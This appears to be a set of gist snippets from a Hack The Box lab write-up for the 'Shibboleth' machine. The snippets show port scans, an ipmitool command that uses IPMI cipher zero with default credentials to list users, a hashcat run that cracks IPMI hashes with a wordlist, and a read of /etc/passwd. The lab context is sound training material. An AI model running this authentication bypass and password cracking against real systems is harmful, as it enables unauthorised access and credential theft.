This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| zabbix@shibboleth:/home$ cat /etc/passwd | grep bash | |
| root:x:0:0:root:/root:/bin/bash | |
| ipmi-svc:x:1000:1000:ipmi-svc,,,:/home/ipmi-svc:/bin/bash |
oxtd
/ hashcat.sh
Created
April 2, 2022 05:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ hashcat -m 7300 hash.txt /usr/share/wordlists/rockyou.txt | |
| hashcat (v6.2.5) starting | |
| OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] | |
| ===================================================================================================================================== | |
| * Device #1: pthread-AMD Ryzen 7 4800H with Radeon Graphics, 2634/5333 MB (1024 MB allocatable), 16MCU | |
| Minimum password length supported by kernel: 0 | |
| Maximum password length supported by kernel: 256 |
oxtd
/ ipmitool.sh
Created
April 2, 2022 05:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P password user list -v 255 ⨯ | |
| Running Get PICMG Properties my_addr 0x20, transit 0, target 0x20 | |
| Error response 0xc1 from Get PICMG Properities | |
| Running Get VSO Capabilities my_addr 0x20, transit 0, target 0x20 | |
| Invalid completion code received: Invalid command | |
| Discovered IPMB address 0x0 | |
| ID Name Callin Link Auth IPMI Msg Channel Priv Limit | |
| 1 true false false USER | |
| 2 Administrator true false true USER | |
| 3 true false false Unknown (0x00) |
oxtd
/ domain2.sh
Created
April 2, 2022 04:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "10.10.11.124 monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb" | sudo tee -a /etc/hosts | |
| 10.10.11.124 monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb |
oxtd
/ udpscan.sh
Created
April 2, 2022 04:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo nmap 10.10.11.124 -sU --min-rate 10000 | |
| Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 10:21 IST | |
| Nmap scan report for shibboleth.htb (10.10.11.124) | |
| Host is up (0.28s latency). | |
| Not shown: 993 open|filtered udp ports (no-response) | |
| PORT STATE SERVICE | |
| 623/udp open asf-rmcp | |
| 1041/udp closed danf-ak2 | |
| 1701/udp closed L2TP | |
| 20359/udp closed unknown |
oxtd
/ 2ndnmap.sh
Created
April 2, 2022 04:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo nmap shibboleth.htb -sCV -p 80 | |
| Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 10:01 IST | |
| Nmap scan report for shibboleth.htb (10.10.11.124) | |
| Host is up (0.33s latency). | |
| PORT STATE SERVICE VERSION | |
| 80/tcp open http Apache httpd 2.4.41 | |
| |_http-title: FlexStart Bootstrap Template - Index | |
| |_http-server-header: Apache/2.4.41 (Ubuntu) |
oxtd
/ tech stack
Created
April 2, 2022 04:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HTTP/1.1 200 OK | |
| Date: Sat, 02 Apr 2022 04:51:37 GMT | |
| Server: Apache/2.4.41 (Ubuntu) | |
| Last-Modified: Tue, 27 Apr 2021 15:38:05 GMT | |
| ETag: "e852-5c0f60c60a3c3-gzip" | |
| Accept-Ranges: bytes | |
| Vary: Accept-Encoding | |
| Content-Length: 59474 | |
| Connection: close | |
| Content-Type: text/html |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "10.10.11.124 shibboleth.htb" | sudo tee -a /etc/hosts | |
| 10.10.11.124 shibboleth.htb |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ export IP=10.10.11.124 | |
| $ sudo nmap $IP -oA Nmap/all-ports-scan -sCV -p- -Pn --min-rate 10000 | |
| Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 09:53 IST | |
| Nmap scan report for 10.10.11.124 | |
| Host is up (0.28s latency). | |
| Not shown: 65534 closed tcp ports (reset) | |
| PORT STATE SERVICE VERSION | |
| 80/tcp open http Apache httpd 2.4.41 | |
| |_http-title: Did not follow redirect to http://shibboleth.htb/ |
oxtd
/ hostfile.sh
Created
March 12, 2022 07:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "10.10.11.118 devzat.htb" | sudo tee -a /etc/hosts | |
| 10.10.11.118 devzat.htb |